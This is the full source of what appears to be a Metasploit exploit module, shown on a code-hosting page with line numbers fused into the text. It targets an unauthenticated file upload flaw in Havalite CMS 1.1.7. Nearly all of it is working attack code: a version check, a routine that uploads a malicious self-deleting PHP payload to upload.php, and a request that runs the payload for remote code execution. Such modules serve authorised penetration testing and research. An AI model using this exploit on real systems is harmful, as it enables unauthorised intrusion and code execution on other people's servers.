Path: blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb
19812 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::PhpEXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => "Havalite CMS Arbitary File Upload Vulnerability",16'Description' => %q{17This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and18possibly prior. Attackers can abuse the upload feature in order to upload a19malicious PHP file without authentication, which results in arbitrary remote code20execution.21},22'License' => MSF_LICENSE,23'Author' => [24'CWH',25'sinn3r' # Metasploit26],27'References' => [28['OSVDB', '94405'],29['EDB', '26243']30],31'Payload' => {32'BadChars' => "\x00"33},34'Platform' => %w{linux php},35'Targets' => [36[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],37[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]38],39'Privileged' => false,40'DisclosureDate' => '2013-06-17',41'DefaultTarget' => 0,42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)4950register_options(51[52OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])53]54)55end5657#58# Checks if target is running HavaLite CMS 1.1.759# We only flag 1.1.7 as vulnerable, because we don't have enough information from60# the vendor or OSVDB about exactly which ones are really vulnerable.61#62def check63uri = normalize_uri(target_uri.path, 'havalite/')64res = send_request_raw({ 'uri' => uri })6566if not res67vprint_error("Connection timed out")68return Exploit::CheckCode::Unknown69end7071js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''72version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''7374if not version.empty? and version =~ /1\.1\.7/75vprint_status("Version found: #{version}")76return Exploit::CheckCode::Appears77end7879Exploit::CheckCode::Safe80end8182#83# Uploads our malicious file84#85def upload(base)86p = get_write_exec_payload(:unlink_self => true)87fname = "#{rand_text_alpha(5)}.php"8889data = Rex::MIME::Message.new90data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")91post_data = data.to_s9293res = send_request_cgi({94'method' => 'POST',95'uri' => normalize_uri(base, 'havalite', 'upload.php'),96'ctype' => "multipart/form-data; boundary=#{data.bound}",97'data' => post_data98})99100if not res101fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")102elsif res.code.to_i == 404103fail_with(Failure::NotFound, "#{peer} - No upload.php found")104elsif res.body =~ /"error"\:"abort"/105fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")106end107108return fname109end110111#112# Executes our uploaded malicious file113#114def exec(base, payload_fname)115res = send_request_raw({116'uri' => normalize_uri(base, 'havalite', 'tmp', 'files', payload_fname)117})118119if res and res.code == 404120fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")121end122end123124def exploit125base = target_uri.path126127print_status("Uploading malicious file...")128fname = upload(base)129130print_status("Executing #{fname}...")131exec(base, fname)132end133end134135136